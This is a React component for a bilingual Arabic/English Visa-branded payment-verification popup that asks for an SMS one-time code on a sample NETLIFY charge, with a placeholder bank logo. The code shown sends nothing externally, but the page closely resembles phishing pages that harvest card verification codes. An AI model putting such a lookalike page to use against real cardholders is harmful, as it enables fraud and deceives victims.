import { useState } from "react";

const VisaLogo = () => (
  <svg
    xmlns="http://www.w3.org/2000/svg"
    viewBox="0 0 750 471"
    className="h-[28px] w-auto"
  >
    <path
      d="M278.2 334.7l35-207h56l-35 207h-56zM524.3 131.3c-11.1-4.2-28.5-8.7-50.2-8.7-55.3 0-94.3 28-94.6 68.2-.3 29.7 27.7 46.3 48.9 56.2 21.7 10.1 29 16.6 28.9 25.7-.1 13.9-17.3 20.2-33.3 20.2-22.3 0-34.1-3.1-52.4-10.7l-7.2-3.3-7.8 46c13 5.7 37 10.7 61.9 11 58.6 0 96.6-27.6 97-70.5.2-23.5-14.6-41.3-46.7-56-19.5-9.5-31.4-15.8-31.3-25.4 0-8.5 10.1-17.6 31.9-17.6 18.2-.3 31.4 3.7 41.7 7.8l5 2.3 7.6-45.2zM619.2 127.7H574c-13.8 0-24.1 3.8-30.1 17.7l-85.4 194.1h60.4l12-31.7h73.7l7 31.7h53.3l-46.7-211.8zm-70.9 135l22.7-58.7c-.3.5 4.7-12.2 7.6-20.1l3.8 18.1 13.2 60.7h-47.3zM232.8 127.7l-54.9 141.2-5.9-28.6c-10.2-33.2-42-69.3-77.5-87.4l50.1 181.8 59.2-.1 88.2-207h-59.2z"
      fill="#1a1f71"
    />
    <path
      d="M131.3 127.7H43.1l-.7 4c69.6 17 115.7 58.1 134.8 107.5l-19.5-94.3c-3.4-13.3-13.3-16.8-26.4-17.2z"
      fill="#f9a533"
    />
  </svg>
);

const content = {
  ar: {
    dir: "rtl",
    title: "التحقق من عملية الدفع",
    message: "لقد أرسلنا رسالة نصية قصيرة تحتوي على رمز توثيق إلى رقم هاتفك المتحرك المسجل لدينا.",
    transaction: (
      <>
        أنت تفوّض تنفيذ دفعة لصالح{" "}
        <strong>NETLIFY</strong>{" "}
        بقيمة{" "}
        <strong>$13.99 USD</strong>{" "}
        بتاريخ{" "}
        <strong>12/04/2026</strong>{" "}
        بواسطة البطاقة المنتهية بـ{" "}
        <strong style={{ letterSpacing: "0.02em" }}>************9878</strong>.
      </>
    ),
    otpLabel: "رمز التحقق",
    submit: "إرسال",
    resend: "إعادة إرسال الرمز",
    resentMsg: "تم إعادة إرسال الرمز بنجاح",
    needHelp: "بحاجة إلى المساعدة؟",
    learnMore: "تعرف على المزيد عن عملية التحقق",
    successTitle: "تمت العملية بنجاح",
    successMsg: "تم التحقق من عملية الدفع بنجاح.",
    error: "يرجى إدخال رمز التحقق",
  },
  en: {
    dir: "ltr",
    title: "Payment Verification",
    message: "We have sent a short SMS containing a verification code to your registered mobile number.",
    transaction: (
      <>
        You are authorizing a payment to{" "}
        <strong>NETLIFY</strong>{" "}
        for{" "}
        <strong>$13.99 USD</strong>{" "}
        on{" "}
        <strong>12/04/2026</strong>{" "}
        using card ending in{" "}
        <strong style={{ letterSpacing: "0.02em" }}>************9878</strong>.
      </>
    ),
    otpLabel: "Verification Code",
    submit: "Submit",
    resend: "Resend Code",
    resentMsg: "Code resent successfully",
    needHelp: "Need Help?",
    learnMore: "Learn more about verification",
    successTitle: "Payment Verified",
    successMsg: "Your payment has been successfully verified.",
    error: "Please enter the verification code",
  },
};

export default function PaymentVerify() {
  const [lang, setLang] = useState<"ar" | "en">("ar");
  const [otp, setOtp] = useState("");
  const [submitted, setSubmitted] = useState(false);
  const [error, setError] = useState("");
  const [resent, setResent] = useState(false);

  const t = content[lang];

  function handleSubmit(e: React.FormEvent) {
    e.preventDefault();
    if (!otp.trim()) {
      setError(t.error);
      return;
    }
    setError("");
    setSubmitted(true);
  }

  function handleResend(e: React.MouseEvent) {
    e.preventDefault();
    setResent(true);
    setOtp("");
    setError("");
    setTimeout(() => setResent(false), 3000);
  }

  function toggleLang() {
    setLang((l) => (l === "ar" ? "en" : "ar"));
    setError("");
  }

  return (
    <div
      className="min-h-screen w-full flex items-center justify-center"
      style={{ background: "#d6d6d6" }}
      dir={t.dir}
    >
      {submitted ? (
        <div
          className="bg-white shadow-xl overflow-hidden text-center p-8"
          style={{ width: "360px", borderRadius: "2px", border: "1px solid #c8c8c8" }}
          dir={t.dir}
        >
          <div className="w-16 h-16 bg-green-100 rounded-full flex items-center justify-center mx-auto mb-4">
            <svg className="w-8 h-8 text-green-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M5 13l4 4L19 7" />
            </svg>
          </div>
          <h2 className="text-xl font-bold text-gray-800 mb-2">{t.successTitle}</h2>
          <p className="text-gray-500 text-sm">{t.successMsg}</p>
        </div>
      ) : (
        <div
          className="bg-white shadow-xl overflow-hidden relative"
          style={{ width: "360px", borderRadius: "2px", border: "1px solid #c8c8c8" }}
        >
          {/* Close button */}
          <button
            className="absolute top-2 text-gray-500 hover:text-gray-800 z-10 leading-none font-light"
            style={{
              fontSize: "18px",
              lineHeight: 1,
              [lang === "ar" ? "left" : "right"]: "8px",
            }}
          >
            ✕
          </button>

          {/* Header */}
          <div
            className="flex items-center justify-between px-4 py-3 border-b bg-white"
            style={{ borderColor: "#ddd" }}
          >
            <VisaLogo />

            <div className="flex items-center gap-2">
              {/* Language toggle */}
              <button
                onClick={toggleLang}
                className="text-xs font-semibold border rounded px-2 py-1 transition-colors hover:bg-gray-100"
                style={{
                  fontSize: "11px",
                  color: "#2563eb",
                  borderColor: "#2563eb",
                  fontFamily: "Arial, sans-serif",
                  letterSpacing: "0.05em",
                }}
              >
                {lang === "ar" ? "EN" : "عربي"}
              </button>

              {/* Bank logo placeholder */}
              <div
                className="flex items-center justify-center rounded"
                style={{
                  width: "90px",
                  height: "36px",
                  border: "2px dashed #ccc",
                  background: "#f5f5f5",
                  color: "#aaa",
                  fontSize: "11px",
                  fontFamily: "Arial, sans-serif",
                }}
              >
                Bank Logo
              </div>
            </div>
          </div>

          {/* Body */}
          <div className="px-5 py-5" dir={t.dir}>
            <h1
              className="text-center font-bold text-gray-900 mb-3"
              style={{ fontSize: "16px", fontFamily: "'Tajawal', Arial, sans-serif" }}
            >
              {t.title}
            </h1>

            <p
              className="text-center text-gray-700 leading-relaxed mb-4"
              style={{ fontSize: "13.5px", fontFamily: "'Tajawal', Arial, sans-serif" }}
            >
              {t.message}
            </p>

            <p
              className="text-center text-gray-800 leading-relaxed mb-5"
              style={{ fontSize: "13px", fontFamily: "'Tajawal', Arial, sans-serif" }}
            >
              {t.transaction}
            </p>

            <form onSubmit={handleSubmit}>
              <div className="mb-3">
                <label
                  htmlFor="otp"
                  className="block text-center text-gray-700 mb-2"
                  style={{ fontSize: "13.5px", fontFamily: "'Tajawal', Arial, sans-serif" }}
                >
                  {t.otpLabel}
                </label>
                <input
                  id="otp"
                  type="text"
                  inputMode="numeric"
                  maxLength={8}
                  placeholder="● ● ● ● ● ●"
                  value={otp}
                  onChange={(e) => {
                    setOtp(e.target.value.replace(/\D/g, ""));
                    setError("");
                  }}
                  className={`w-full text-center py-2 px-3 outline-none transition-all ${
                    error ? "border border-red-400 bg-red-50" : "border border-gray-300 bg-white"
                  }`}
                  style={{
                    direction: "ltr",
                    letterSpacing: "0.2em",
                    fontSize: "16px",
                    borderRadius: "3px",
                    boxShadow: error ? undefined : "inset 0 1px 2px rgba(0,0,0,0.07)",
                  }}
                  onFocus={(e) => {
                    e.currentTarget.style.borderColor = "#3b82f6";
                    e.currentTarget.style.boxShadow = "0 0 0 2px rgba(59,130,246,0.15)";
                  }}
                  onBlur={(e) => {
                    e.currentTarget.style.borderColor = error ? "#f87171" : "#d1d5db";
                    e.currentTarget.style.boxShadow = "inset 0 1px 2px rgba(0,0,0,0.07)";
                  }}
                />
                {error && (
                  <p className="text-red-500 text-center mt-1" style={{ fontSize: "12px" }}>
                    {error}
                  </p>
                )}
              </div>

              <button
                type="submit"
                className="w-full py-2.5 text-white font-bold transition-opacity hover:opacity-90 active:opacity-80"
                style={{
                  background: "#2563eb",
                  borderRadius: "3px",
                  fontSize: "15px",
                  fontFamily: "'Tajawal', Arial, sans-serif",
                }}
              >
                {t.submit}
              </button>
            </form>

            <div className="mt-4 text-center">
              {resent ? (
                <p className="text-green-600" style={{ fontSize: "13px", fontFamily: "'Tajawal', Arial, sans-serif" }}>
                  {t.resentMsg}
                </p>
              ) : (
                <a
                  href="#"
                  onClick={handleResend}
                  className="hover:underline"
                  style={{ color: "#1d4ed8", fontSize: "13px", fontFamily: "'Tajawal', Arial, sans-serif" }}
                >
                  {t.resend}
                </a>
              )}
            </div>

            <div
              className="mt-4 pt-3 flex items-center justify-center gap-1"
              style={{ borderTop: "1px solid #e5e7eb", fontSize: "13px", fontFamily: "'Tajawal', Arial, sans-serif" }}
            >
              <a href="#" className="hover:underline font-medium" style={{ color: "#1d4ed8" }}>
                {t.needHelp}
              </a>
              <span className="text-gray-400 mx-1">|</span>
              <a href="#" className="hover:underline font-medium" style={{ color: "#1d4ed8" }}>
                {t.learnMore}
              </a>
            </div>
          </div>
        </div>
      )}
    </div>
  );
}
